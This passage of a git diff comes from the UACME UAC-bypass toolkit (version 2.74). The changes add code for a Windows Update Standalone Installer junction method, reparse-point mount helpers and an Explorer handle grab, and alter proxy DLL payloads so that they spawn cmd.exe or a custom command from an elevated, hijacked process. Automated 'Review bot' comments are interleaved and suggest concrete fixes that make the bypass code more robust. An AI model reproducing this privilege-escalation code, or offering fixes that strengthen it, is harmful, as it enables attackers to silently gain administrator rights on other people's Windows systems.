+ NtClose(hExplorer);
+ }
+#endif
+
+ return (g_ThreadFinished == 1);
+}
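Review bot: The FILE_NOTIFY_INFORMATION walk at the bottom of the inner `for (;;)` in ucmxDirectoryWatchdogThread tests `NextEntryOffset` on the record it has just advanced to, so in a buffer holding more than one record the last one is never examined, and nothing bounds the walk by `IoStatusBlock.Information`; test before advancing, `if (pInfo->NextEntryOffset == 0) break;` and then `pInfo = (FILE_NOTIFY_INFORMATION*)(((LPBYTE)pInfo) + pInfo->NextEntryOffset);`. The cleanup path then spins in `while (g_ThreadFinished != 1) Sleep(100);`, but ucmxInvokeWusaThread only sets the flag inside `if (ShellExecuteEx(&shinfo))`, so a failed launch leaves the watchdog looping until ucmWusaExtractViaJunction's `TerminateThread` kills it with the reparse point, `hReparseDirectory`, `CapturedDirectoryName` and `Buffer` never released; set the flag on the failure path as well, or bound the wait, so the cleanup that follows always runs. ucmWusaExtractViaJunction also returns `g_ThreadFinished == 1`, which only records that wusa was started, while the watchdog's `bResult` from supSetMountPoint becomes a thread exit code that no caller reads.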
diff --git a/Source/Akagi/methods/wusa.h b/Source/Akagi/methods/wusa.h
new file mode 100644
index 0000000..6b160bf
--- /dev/null
+++ b/Source/Akagi/methods/wusa.h
@@ -0,0 +1,30 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: WUSA.H
+*
+* VERSION: 2.74
+*
+* DATE: 20 June 2017
+*
+* Prototypes and definitions for Windows Update Standalone Installer (WUSA) based methods.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+BOOL ucmWusaExtractPackage(
+ _In_ LPWSTR lpTargetDirectory);
+
+BOOL ucmCreateCabinetForSingleFile(
+ _In_ LPWSTR lpSourceDll,
+ _In_ PVOID ProxyDll,
+ _In_ DWORD ProxyDllSize);
+
+BOOL ucmWusaExtractViaJunction(
+ _In_ LPWSTR lpTargetDirectory);
diff --git a/Source/Akagi/sup.c b/Source/Akagi/sup.c
index 470fd07..f04e041 100644
--- a/Source/Akagi/sup.c
+++ b/Source/Akagi/sup.c
@@ -4,9 +4,9 @@
*
* TITLE: SUP.C
*
-* VERSION: 2.72
+* VERSION: 2.74
*
-* DATE: 26 May 2017
+* DATE: 20 June 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -109,6 +109,32 @@ BOOL supGetElevationType(
return (NT_SUCCESS(status));
}
+/*
+* supGetExplorerHandle
+*
+* Purpose:
+*
+* Returns Explorer process handle opened with maximum allowed rights or NULL on error.
+*
+*/
+HANDLE supGetExplorerHandle(
+ VOID
+)
+{
+ HWND hTrayWnd = NULL;
+ DWORD dwProcessId = 0;
+
+ hTrayWnd = FindWindow(TEXT("Shell_TrayWnd"), NULL);
+ if (hTrayWnd == NULL)
+ return NULL;
+
+ GetWindowThreadProcessId(hTrayWnd, &dwProcessId);
+ if (dwProcessId == 0)
+ return NULL;
+
+ return OpenProcess(MAXIMUM_ALLOWED, FALSE, dwProcessId);
+}
+
/*
* supWriteBufferToFile
*
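Review bot: The Purpose block of supGetExplorerHandle promises "Explorer process handle", but the code returns a handle to whichever process owns `Shell_TrayWnd`, which is explorer.exe only while the default shell is running, and the caller is responsible for closing it (ucmWusaExtractViaJunction does so with NtClose). Make both facts explicit in the header: `Returns a MAXIMUM_ALLOWED handle to the process owning Shell_TrayWnd (normally explorer.exe), or NULL; the caller must NtClose it.`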
@@ -312,7 +338,7 @@ BOOL supRunProcess2(
)
{
BOOL bResult;
- SHELLEXECUTEINFOW shinfo;
+ SHELLEXECUTEINFO shinfo;
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
if (lpszProcessName == NULL)
@@ -324,7 +350,7 @@ BOOL supRunProcess2(
shinfo.lpParameters = lpszParameters;
shinfo.lpDirectory = NULL;
shinfo.nShow = SW_SHOW;
- bResult = ShellExecuteExW(&shinfo);
+ bResult = ShellExecuteEx(&shinfo);
if (bResult) {
if (fWait)
WaitForSingleObject(shinfo.hProcess, 0x8000);
@@ -852,7 +878,7 @@ DWORD supExpandEnvironmentStrings(
&Length
);
if (NT_SUCCESS(Status) || Status == STATUS_BUFFER_TOO_SMALL) {
- return(Length / sizeof(WCHAR));
+ return (DWORD)(Length / sizeof(WCHAR));
}
else {
RtlSetLastWin32Error(RtlNtStatusToDosError(Status));
@@ -1122,3 +1148,130 @@ BOOL supSetEnvVariable(
return bResult;
}
+
+/*
+* supDeleteMountPoint
+*
+* Purpose:
+*
+* Removes reparse point of type mount_point from directory.
+*
+*/
+BOOL supDeleteMountPoint(
+ _In_ HANDLE hDirectory
+)
+{
+ NTSTATUS status;
+ IO_STATUS_BLOCK IoStatusBlock;
+
+ REPARSE_GUID_DATA_BUFFER Buffer;
+
+ RtlSecureZeroMemory(&Buffer, sizeof(REPARSE_GUID_DATA_BUFFER));
+ Buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
+
+ status = NtFsControlFile(hDirectory,
+ NULL,
+ NULL,
+ NULL,
+ &IoStatusBlock,
+ FSCTL_DELETE_REPARSE_POINT,
+ &Buffer,
+ REPARSE_GUID_DATA_BUFFER_HEADER_SIZE,
+ NULL,
+ 0);
+
+ if (status == STATUS_NOT_A_REPARSE_POINT) {
+ SetLastError(ERROR_INVALID_PARAMETER);
+ }
+ else {
+ SetLastError(RtlNtStatusToDosError(status));
+ }
+
+ return NT_SUCCESS(status);
+}
+
+/*
+* supSetMountPoint
+*
+* Purpose:
+*
+* Install reparse point of type mount_point to directory.
+*
+*/
+BOOL supSetMountPoint(
+ _In_ HANDLE hDirectory,
+ _In_ LPWSTR lpTarget,
+ _In_ LPWSTR lpPrintName
+)
+{
+ ULONG memIO;
+ USHORT cbTarget, cbPrintName, reparseDataLength;
+ NTSTATUS status;
+ IO_STATUS_BLOCK IoStatusBlock;
+
+ REPARSE_DATA_BUFFER *Buffer;
+
+ if ((lpTarget == NULL) || (lpPrintName == NULL)) {
+ SetLastError(ERROR_INVALID_PARAMETER);
+ return FALSE;
+ }
+
+ //
+ // Calculate required buffer size.
+ // Header + length of input strings + safe space.
+ //
+ cbTarget = (USHORT)(_strlen(lpTarget) * sizeof(WCHAR));
+ cbPrintName = (USHORT)(_strlen(lpPrintName) * sizeof(WCHAR));
+
+ reparseDataLength = cbTarget + cbPrintName + 12;
+ memIO = (ULONG)(reparseDataLength + REPARSE_DATA_BUFFER_HEADER_LENGTH);
+
+ Buffer = supHeapAlloc((SIZE_T)memIO);
+ if (Buffer == NULL)
+ return FALSE;
+
+ //
+ // Setup reparse point structure.
+ //
+ Buffer->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
+ Buffer->ReparseDataLength = reparseDataLength;
+
+ //
+ // Add Target to PathBuffer.
+ //
+ Buffer->MountPointReparseBuffer.SubstituteNameOffset = 0;
+ Buffer->MountPointReparseBuffer.SubstituteNameLength = cbTarget;
+
+ RtlCopyMemory(Buffer->MountPointReparseBuffer.PathBuffer,
+ lpTarget,
+ cbTarget);
+
+ //
+ // Add PrintName to PathBuffer.
+ //
+ Buffer->MountPointReparseBuffer.PrintNameOffset = cbTarget + sizeof(UNICODE_NULL);
+ Buffer->MountPointReparseBuffer.PrintNameLength = cbPrintName;
+
+ RtlCopyMemory(&Buffer->MountPointReparseBuffer.PathBuffer[(cbTarget / sizeof(WCHAR)) + 1],
+ lpPrintName,
+ cbPrintName);
+
+ //
+ // Set reparse point.
+ //
+ status = NtFsControlFile(hDirectory,
+ NULL,
+ NULL,
+ NULL,
+ &IoStatusBlock,
+ FSCTL_SET_REPARSE_POINT,
+ Buffer,
+ memIO,
+ NULL,
+ 0);
+
+ supHeapFree(Buffer);
+
+ SetLastError(RtlNtStatusToDosError(status));
+ return NT_SUCCESS(status);
+}
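Review bot: `reparseDataLength = cbTarget + cbPrintName + 12;` in supSetMountPoint hard-codes the size of the four USHORT offset/length fields plus two terminating UNICODE_NULLs; spell it out so the layout is checkable against the struct in sup.h, e.g. `reparseDataLength = (USHORT)(FIELD_OFFSET(REPARSE_DATA_BUFFER, MountPointReparseBuffer.PathBuffer) - REPARSE_DATA_BUFFER_HEADER_LENGTH + cbTarget + cbPrintName + 2 * sizeof(UNICODE_NULL));`. Neither terminator nor `Buffer->Reserved` is ever written, so the buffer is only well-formed if supHeapAlloc returns zeroed memory — if it does, a comment on the `supHeapAlloc((SIZE_T)memIO)` call should say so; if not, write them explicitly. The `(USHORT)` casts on `_strlen(...) * sizeof(WCHAR)` truncate silently for inputs longer than 32767 characters, so a `if (_strlen(lpTarget) * sizeof(WCHAR) > MAXUSHORT) { SetLastError(ERROR_INVALID_PARAMETER); return FALSE; }` guard (and the same for lpPrintName) before the casts keeps the declared lengths honest; MAXUSHORT is the ntdef.h constant, substitute whatever limit macro this project has in scope.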
diff --git a/Source/Akagi/sup.h b/Source/Akagi/sup.h
index b2ae77e..e795dec 100644
--- a/Source/Akagi/sup.h
+++ b/Source/Akagi/sup.h
@@ -4,9 +4,9 @@
*
* TITLE: SUP.H
*
-* VERSION: 2.72
+* VERSION: 2.74
*
-* DATE: 26 May 2017
+* DATE: 11 June 2017
*
* Common header file for the program support routines.
*
@@ -28,12 +28,44 @@ typedef struct _SXS_SEARCH_CONTEXT {
LPWSTR FullDllPath;
} SXS_SEARCH_CONTEXT, *PSXS_SEARCH_CONTEXT;
+//ntifs.h
+typedef struct _REPARSE_DATA_BUFFER {
+ ULONG ReparseTag;
+ USHORT ReparseDataLength;
+ USHORT Reserved;
+ union {
+ struct {
+ USHORT SubstituteNameOffset;
+ USHORT SubstituteNameLength;
+ USHORT PrintNameOffset;
+ USHORT PrintNameLength;
+ ULONG Flags;
+ WCHAR PathBuffer[1];
+ } SymbolicLinkReparseBuffer;
+ struct {
+ USHORT SubstituteNameOffset;
+ USHORT SubstituteNameLength;
+ USHORT PrintNameOffset;
+ USHORT PrintNameLength;
+ WCHAR PathBuffer[1];
+ } MountPointReparseBuffer;
+ struct {
+ UCHAR DataBuffer[1];
+ } GenericReparseBuffer;
+ } DUMMYUNIONNAME;
+} REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER;
+
+#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)
+
BOOLEAN supIsProcess32bit(
_In_ HANDLE hProcess);
BOOL supGetElevationType(
TOKEN_ELEVATION_TYPE *lpType);
+HANDLE supGetExplorerHandle(
+ VOID);
+
BOOL supWriteBufferToFile(
_In_ LPWSTR lpFileName,
_In_ PVOID Buffer,
@@ -133,4 +165,12 @@ BOOL supSetEnvVariable(
_In_ LPWSTR lpVariableName,
_In_opt_ LPWSTR lpVariableData);
+BOOL supSetMountPoint(
+ _In_ HANDLE hDirectory,
+ _In_ LPWSTR lpTarget,
+ _In_ LPWSTR lpPrintName);
+
+BOOL supDeleteMountPoint(
+ _In_ HANDLE hDirectory);
+
#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)
diff --git a/Source/Akagi/tests/test.c b/Source/Akagi/tests/test.c
index ace80f0..c298360 100644
--- a/Source/Akagi/tests/test.c
+++ b/Source/Akagi/tests/test.c
@@ -4,9 +4,9 @@
*
* TITLE: TEST.C
*
-* VERSION: 2.72
+* VERSION: 2.74
*
-* DATE: 26 May 2017
+* DATE: 11 June 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
diff --git a/Source/Akagi/uacme.vcxproj b/Source/Akagi/uacme.vcxproj
index ff2e780..5271d8d 100644
--- a/Source/Akagi/uacme.vcxproj
+++ b/Source/Akagi/uacme.vcxproj
@@ -390,11 +390,13 @@
+
+
@@ -412,6 +414,7 @@
+
@@ -422,6 +425,7 @@
+
diff --git a/Source/Akagi/uacme.vcxproj.filters b/Source/Akagi/uacme.vcxproj.filters
index 12b8e21..544eebe 100644
--- a/Source/Akagi/uacme.vcxproj.filters
+++ b/Source/Akagi/uacme.vcxproj.filters
@@ -129,6 +129,12 @@
Source Files\methods
+
+ Source Files\methods
+
+
+ Source Files\methods
+
@@ -209,6 +215,12 @@
Header Files\methods
+
+ Header Files\methods
+
+
+ Header Files\methods
+
diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user
index 9bd6ef8..3b328b0 100644
--- a/Source/Akagi/uacme.vcxproj.user
+++ b/Source/Akagi/uacme.vcxproj.user
@@ -17,11 +17,11 @@
WindowsLocalDebugger
- 0
+ 36
WindowsLocalDebugger
- 0
+ 36
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Akatsuki/dllmain.c b/Source/Akatsuki/dllmain.c
index 5e2802f..72a2786 100644
--- a/Source/Akatsuki/dllmain.c
+++ b/Source/Akatsuki/dllmain.c
@@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
-* VERSION: 2.70
+* VERSION: 2.74
*
-* DATE: 22 Mar 2017
+* DATE: 20 June 2017
*
* Proxy dll entry point, Akatsuki.
* Special dll for wow64 logger method.
@@ -147,9 +147,12 @@ BOOL ucmQueryCustomParameter(
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
- GetStartupInfoW(&startupInfo);
+ GetStartupInfo(&startupInfo);
- bResult = CreateProcessW(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
+ startupInfo.dwFlags = STARTF_USESHOWWINDOW;
+ startupInfo.wShowWindow = SW_SHOW;
+
+ bResult = CreateProcess(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
NULL, &startupInfo, &processInfo);
if (bResult) {
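Review bot: `startupInfo.dwFlags = STARTF_USESHOWWINDOW;` immediately after `GetStartupInfo(&startupInfo);` overwrites the flags GetStartupInfo just filled in (for example STARTF_USESTDHANDLES), so the remaining fields it populated are left inconsistent with the flags and the call no longer contributes anything; either merge the flag, `startupInfo.dwFlags |= STARTF_USESHOWWINDOW;`, or drop the GetStartupInfo call the way Fubuki's DefaultPayload does in this same commit. The same assignment-after-GetStartupInfo pattern appears in the second Akatsuki hunk, both Hibiki hunks and both Ikazuchi hunks of this commit. The enclosing ucmQueryCustomParameter begins and ends outside the hunk.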
@@ -251,7 +254,7 @@ BOOL WINAPI DllMain(
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
- GetStartupInfoW(&startupInfo);
+ GetStartupInfo(&startupInfo);
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
cch = ucmExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);
@@ -260,7 +263,10 @@ BOOL WINAPI DllMain(
_strcpy(cmdbuf, sysdir);
_strcat(cmdbuf, TEXT("cmd.exe"));
- if (CreateProcessW(cmdbuf, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL,
+ startupInfo.dwFlags = STARTF_USESHOWWINDOW;
+ startupInfo.wShowWindow = SW_SHOW;
+
+ if (CreateProcess(cmdbuf, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL,
sysdir, &startupInfo, &processInfo))
{
CloseHandle(processInfo.hProcess);
diff --git a/Source/Akatsuki/version.rc b/Source/Akatsuki/version.rc
index 0c46580..3b95583 100644
Binary files a/Source/Akatsuki/version.rc and b/Source/Akatsuki/version.rc differ
diff --git a/Source/Fubuki/dll.vcxproj b/Source/Fubuki/dll.vcxproj
index 9fba274..2b6a755 100644
--- a/Source/Fubuki/dll.vcxproj
+++ b/Source/Fubuki/dll.vcxproj
@@ -336,11 +336,13 @@
+
+
diff --git a/Source/Fubuki/dll.vcxproj.filters b/Source/Fubuki/dll.vcxproj.filters
index 606e368..a9b5f13 100644
--- a/Source/Fubuki/dll.vcxproj.filters
+++ b/Source/Fubuki/dll.vcxproj.filters
@@ -55,6 +55,12 @@
minirtl
+
+ minirtl
+
+
+ minirtl
+
diff --git a/Source/Fubuki/dllmain.c b/Source/Fubuki/dllmain.c
index cc8a33d..83e031c 100644
--- a/Source/Fubuki/dllmain.c
+++ b/Source/Fubuki/dllmain.c
@@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
-* VERSION: 2.71
+* VERSION: 2.74
*
-* DATE: 07 May 2017
+* DATE: 20 June 2017
*
* Proxy dll entry point, Fubuki Kai Ni.
*
@@ -84,13 +84,13 @@ void ucmShowProcessIntegrityLevel(
)
{
NTSTATUS status;
- HANDLE hToken;
+ HANDLE hToken = NULL;
- ULONG LengthNeeded;
+ ULONG LengthNeeded = 0;
PTOKEN_MANDATORY_LABEL pTIL = NULL;
DWORD dwIntegrityLevel;
- WCHAR *t = NULL;
+ LPWSTR lpText = NULL;
WCHAR szBuffer[MAX_PATH + 1];
status = NtOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY, &hToken);
@@ -109,25 +109,25 @@ void ucmShowProcessIntegrityLevel(
if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID)
{
- t = L"Low Process";
+ lpText = L"Low Process";
}
else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID &&
dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
{
- t = L"Medium Process";
+ lpText = L"Medium Process";
}
else if (dwIntegrityLevel == SECURITY_MANDATORY_HIGH_RID)
{
- t = L"High Integrity Process";
+ lpText = L"High Integrity Process";
}
else if (dwIntegrityLevel == SECURITY_MANDATORY_SYSTEM_RID)
{
- t = L"System Integrity Process";
+ lpText = L"System Integrity Process";
}
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
wsprintf(szBuffer, L"PID=%lu, IntegrityLevel=%ws",
- GetCurrentProcessId(), t);
+ GetCurrentProcessId(), lpText);
}
LocalFree(pTIL);
@@ -135,7 +135,12 @@ void ucmShowProcessIntegrityLevel(
}
NtClose(hToken);
}
- if (t) MessageBox(GetDesktopWindow(), szBuffer, GetCommandLineW(), MB_ICONINFORMATION);
+ if (lpText) {
+ MessageBox(GetDesktopWindow(),
+ szBuffer,
+ GetCommandLine(),
+ MB_ICONINFORMATION);
+ }
}
/*
@@ -245,6 +250,7 @@ VOID DefaultPayload(
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
+ //GetStartupInfo(&startupInfo);
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
cch = ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);
diff --git a/Source/Fubuki/version.rc b/Source/Fubuki/version.rc
index b4e8bda..1e26504 100644
Binary files a/Source/Fubuki/version.rc and b/Source/Fubuki/version.rc differ
diff --git a/Source/Hibiki/dllmain.c b/Source/Hibiki/dllmain.c
index a984937..7b793ed 100644
--- a/Source/Hibiki/dllmain.c
+++ b/Source/Hibiki/dllmain.c
@@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
-* VERSION: 2.70
+* VERSION: 2.74
*
-* DATE: 21 Mar 2017
+* DATE: 20 June 2017
*
* AVrf entry point, Hibiki Kai Ni.
*
@@ -346,6 +346,9 @@ BOOL ucmQueryCustomParameter(
startupInfo.cb = sizeof(startupInfo);
ucmGetStartupInfo(&startupInfo);
+ startupInfo.dwFlags = STARTF_USESHOWWINDOW;
+ startupInfo.wShowWindow = SW_SHOW;
+
bResult = pCreateProcessW(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
NULL, &startupInfo, &processInfo);
@@ -404,6 +407,9 @@ VOID ucmbRunTarget(
_strcpy_w(cmdbuf, sysdir);
_strcat_w(cmdbuf, L"cmd.exe");
+ startupInfo.dwFlags = STARTF_USESHOWWINDOW;
+ startupInfo.wShowWindow = SW_SHOW;
+
if (pCreateProcessW(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL,
sysdir, &startupInfo, &processInfo))
{
diff --git a/Source/Hibiki/version.rc b/Source/Hibiki/version.rc
index 944db34..ddc0cf8 100644
Binary files a/Source/Hibiki/version.rc and b/Source/Hibiki/version.rc differ
diff --git a/Source/Ikazuchi/dllmain.c b/Source/Ikazuchi/dllmain.c
index 6d50933..118609e 100644
--- a/Source/Ikazuchi/dllmain.c
+++ b/Source/Ikazuchi/dllmain.c
@@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
-* VERSION: 2.70
+* VERSION: 2.74
*
-* DATE: 21 Mar 2017
+* DATE: 20 June 2017
*
* Proxy dll entry point, Ikazuchi.
*
@@ -402,7 +402,7 @@ BOOL ucmQueryCustomParameter(
HKEY hKey = NULL;
PVOID ProcessHeap = NtCurrentPeb()->ProcessHeap;
LPWSTR lpData = NULL, lpParameter = NULL, lpszParamKey = NULL;
- STARTUPINFOW startupInfo;
+ STARTUPINFO startupInfo;
PROCESS_INFORMATION processInfo;
ULONG bytesIO = 0L;
OBJSCANPARAM Param;
@@ -467,7 +467,10 @@ BOOL ucmQueryCustomParameter(
startupInfo.cb = sizeof(startupInfo);
GetStartupInfo(&startupInfo);
- bResult = CreateProcessW(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
+ startupInfo.dwFlags = STARTF_USESHOWWINDOW;
+ startupInfo.wShowWindow = SW_SHOW;
+
+ bResult = CreateProcess(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
NULL, &startupInfo, &processInfo);
if (bResult) {
@@ -525,7 +528,7 @@ BOOL WINAPI DllMain(
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
- GetStartupInfoW(&startupInfo);
+ GetStartupInfo(&startupInfo);
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
cch = ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);
@@ -534,7 +537,10 @@ BOOL WINAPI DllMain(
_strcpy(cmdbuf, sysdir);
_strcat(cmdbuf, TEXT("cmd.exe"));
- if (CreateProcessW(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL,
+ startupInfo.dwFlags = STARTF_USESHOWWINDOW;
+ startupInfo.wShowWindow = SW_SHOW;
+
+ if (CreateProcess(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL,
sysdir, &startupInfo, &processInfo))
{
CloseHandle(processInfo.hProcess);
diff --git a/Source/Ikazuchi/version.rc b/Source/Ikazuchi/version.rc
index 9b12193..25ecaee 100644
Binary files a/Source/Ikazuchi/version.rc and b/Source/Ikazuchi/version.rc differ
diff --git a/Source/Shared/ntos.h b/Source/Shared/ntos.h
index 8e4dc24..5ed07db 100644
--- a/Source/Shared/ntos.h
+++ b/Source/Shared/ntos.h
@@ -4,9 +4,9 @@
*
* TITLE: NTOS.H
*
-* VERSION: 1.70
+* VERSION: 1.71
*
-* DATE: 27 May 2017
+* DATE: 28 May 2017
*
* Common header file for the ntos API functions and definitions.
*
@@ -5605,6 +5605,11 @@ NTSTATUS NTAPI NtDuplicateToken(
_Out_ PHANDLE NewTokenHandle
);
+#define DISABLE_MAX_PRIVILEGE 0x1 // winnt
+#define SANDBOX_INERT 0x2 // winnt
+#define LUA_TOKEN 0x4
+#define WRITE_RESTRICT 0x8
+
NTSTATUS NTAPI NtFilterToken(
_In_ HANDLE ExistingTokenHandle,
_In_ ULONG Flags,
@@ -5658,20 +5663,6 @@ NTSTATUS NTAPI NtQueryInformationToken(
_Out_ PULONG ReturnLength
);
-#define DISABLE_MAX_PRIVILEGE 0x1 // winnt
-#define SANDBOX_INERT 0x2 // winnt
-#define LUA_TOKEN 0x4
-#define WRITE_RESTRICT 0x8
-
-NTSTATUS NTAPI NtFilterToken(
- _In_ HANDLE ExistingTokenHandle,
- _In_ ULONG Flags,
- _In_opt_ PTOKEN_GROUPS SidsToDisable,
- _In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete,
- _In_opt_ PTOKEN_GROUPS RestrictedSids,
- _Out_ PHANDLE NewTokenHandle
- );
-
NTSTATUS NTAPI NtCreateKey(
_Out_ PHANDLE KeyHandle,
_In_ ACCESS_MASK DesiredAccess,
diff --git a/Source/uacme.sln b/Source/uacme.sln
index 9333617..a290bd4 100644
--- a/Source/uacme.sln
+++ b/Source/uacme.sln
@@ -59,10 +59,10 @@ Global
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|Win32.Build.0 = Release|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.ActiveCfg = Release|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.Build.0 = Release|x64
- {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32
- {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32
- {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64
- {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64
+ {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.ActiveCfg = Release|Win32
+ {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.Build.0 = Release|Win32
+ {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.ActiveCfg = Release|x64
+ {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.Build.0 = Release|x64
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.ActiveCfg = Release|Win32
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.Build.0 = Release|Win32
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|x64.ActiveCfg = Debug|x64
diff --git a/UACME.sha256 b/UACME.sha256
index 5764dde..0f43c16 100644
--- a/UACME.sha256
+++ b/UACME.sha256
@@ -1,8 +1,8 @@
-46e4306bdea79c3e8269b78637bbbe510d6ee65ea18268f7788aec26b4806c41 *Compiled\Akagi32.exe
-b0e32db8c822014c282ef3aba46bac0bf934c4c3d0fcde2f3bf5f64f39789044 *Compiled\Akagi64.exe
+b20d491148d3a52b8de0783bc5879682b8f0a62c38e81b594a3848e2e918d059 *Compiled\Akagi32.exe
+a98802c8f2e68ff9568feaa1fb2e30e88601e1d50169454239d44f188bcf2482 *Compiled\Akagi64.exe
376d63708d4e0d761f6d9224b9d5504c07b3cd5b5ae5fd40a3a3d77c4d5873d5 *Compiled\UacInfo64.exe
c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdll\readme1st.txt
-4d14153dd95bd5441763283de03afb74aa5f3fc0b68d7629be43d27e3d41c5e1 *Source\uacme.sln
+4055ddeaea8805ded4aba4b730ed799e5187eaa29381c59f0ecc0f3a6d10b090 *Source\uacme.sln
8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
3fb2b94aa2ee33753fcc20fa1834be8a929a29248217cfb84a54956eeea1a824 *Source\Akagi\bin32res.h
@@ -11,92 +11,96 @@ c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdl
82684e4844773aa06296e76697cb2777bb4cb1cb23b06aa0c2dcc80fea33ca3d *Source\Akagi\bin64res.rc
a552fb7dfd3982f2ed58a745b928b8146a8632499dc01a64f534646caf02450e *Source\Akagi\compress.c
9f93bbb4c77349179641415ec9a4367a6f77dc28b093d3d11231f6abf8c3cd78 *Source\Akagi\compress.h
-ea90559a90c70292830258de4265a39fbab63408ab41711ad824eed5e6730fdf *Source\Akagi\consts.h
-5e5c5c2b73d8b4d1ac33a25714834349625a5f0e580582d0375fd0969d6d9297 *Source\Akagi\global.h
-1346bd4919e656fc5b3bff0f9e8b4b7ab928ad006b7af89952eef5275ae52220 *Source\Akagi\main.c
+2cd1eb208e9728b7cc3c2172b8ff0cb383b1aacef774d6b3aca704447e64b023 *Source\Akagi\consts.h
+2a14b3238a613d4d2beb9061771f27a4a8d55da2ec80e210cd7a8e84bb29ebb9 *Source\Akagi\global.h
+9d2fff691a6ac0fdddff9ff13523ed7933180b72d6a9cb4ccba5e9b425647c1c *Source\Akagi\main.c
a8ec3b9411f2408b5cfa4b0c77aa045957d3144aebd343cfa7da03d78226e3b3 *Source\Akagi\makecab.c
bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h
f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
-dae1ff25ab3cfa35aacd0eb1aace255ab4aa2c578d656fb81b13664d02d176e3 *Source\Akagi\Resource.rc
